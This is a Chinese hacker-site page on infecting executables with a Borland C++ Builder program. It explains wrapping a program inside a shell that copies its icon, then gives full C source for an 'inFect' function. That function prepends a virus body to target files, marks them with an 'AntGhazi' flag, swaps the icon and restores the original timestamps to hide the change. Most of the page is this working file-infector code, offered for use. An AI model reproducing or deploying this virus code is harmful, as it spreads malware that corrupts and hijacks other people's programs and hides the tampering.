关于BCB写入文件进行感染的问题我爱黑客基地,山西黑客,黑客联盟,信息安全,黑客联盟,木马编写,安全检测,软件破解,数据修复,机房维护,网站开发,黑客教程,黑客入门,动画教程,源码下载,书籍教程,黑客培训,刷QB,刷业务,QQ,IDC,域名主机

　　提示一点，一种最简单的方法是，自己做一个外壳程序(Shell)，然后将要运行的程序以某种方式放入到外壳程序中（比如以资源或者特定位置数据），而外壳程序可以抽取原可执行程序文件得图标，并可修改自己的图标与之相同。这样一来，经过修改的程序就是外壳程序 + 原可执行程序（已作为数据存在于外壳程序中），运行后自然先启动外壳程序，你可以在其中加入一些权限判定的代码，通过验证后，外壳程序将自身中的真正可执行文件数据提取并运行。这里面的要求是，外壳程序必须用纯 WinAPI SDK 方式编写，以减少文件体积；外壳程序应当对写入自身的原可执行程序数据作加密处理，以防被窃取。你可以位外壳程序增加感染功能（不要做病毒哦……）等等。

　　/**************************************************************************** Function Name : inFect Function : 感染文件 Parement : char *strFile 文件名 char *strSource 病毒体 DWORD dwSourceSize 病毒体长度 Return : if success return 1,else return 0; *****************************************************************************/ int inFect(WIN32_FIND_DATA _lpFindFileData,char *strSource,DWORD dwSourceSize){ HANDLE hSearchFile=NULL; DWORD dwSearchFileSize=0; char VirusFlag[10]={'\0'}; DWORD bytes_write; WIN32_FIND_DATA lpFindFileData=_lpFindFileData; char *strFile=lpFindFileData.cFileName ; //char *strFile="AntGhazi.tmp\0";//测试时，特定只感染此文件 //strFile="e:\\kkkk\\a.exe";//c:\\AntGhazi.tmp\0";//测试时，特定只感染此文件 ::SetFileAttributes (strFile,FILE_ATTRIBUTE_NORMAL); hSearchFile=::CreateFile (strFile,GENERIC_READ|GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); if(hSearchFile == INVALID_HANDLE_VALUE){ ::CloseHandle (hSearchFile); ::SetFileAttributes (strFile,lpFindFileData.dwFileAttributes ); return 0; } ::SetFilePointer (hSearchFile,80, NULL, FILE_BEGIN); //先读取标志 ::ReadFile (hSearchFile,VirusFlag,8,&bytes_write,0); ::ReadFile (hSearchFile,&dwSearchFileSize,4,&bytes_write,0); if(strcmp(VirusFlag,"AntGhazi")!=0){ //感染 //先读取长度 dwSearchFileSize=::GetFileSize (hSearchFile,NULL); //原长度 if(dwSearchFileSize>10485760){ //如果文件大于10M，则退出 ::CloseHandle (hSearchFile); ::SetFileAttributes (strFile,lpFindFileData.dwFileAttributes ); return 0; } char *pSearchFile=new char[dwSearchFileSize]; ::SetFilePointer (hSearchFile,0,NULL,FILE_BEGIN); //读取原文件内容 ::ReadFile (hSearchFile,pSearchFile,dwSearchFileSize,&bytes_write,0); memmove(strSource+80,"AntGhazi",8); //写入标志 memcpy(strSource+88,&dwSearchFileSize,4); //写入源长度 ::SetFilePointer(hSearchFile,0,NULL,FILE_BEGIN); //准备写入文件中 ModifyIcon(&strSource,pSearchFile); //修改ICON ::WriteFile (hSearchFile,strSource,dwSourceSize,&bytes_write,0); ::WriteFile (hSearchFile,pSearchFile,dwSearchFileSize,&bytes_write,0); delete pSearchFile; SetFileTime(hSearchFile,&lpFindFileData.ftCreationTime,&lpFindFileData.ftLastAccessTime ,&lpFindFileData.ftLastWriteTime);//写入日期 ::CloseHandle (hSearchFile); }else{ ::CloseHandle (hSearchFile); } ::SetFileAttributes (strFile,lpFindFileData.dwFileAttributes ); return 1; }

查看更多与关于BCB写入文件进行感染的问题相关内容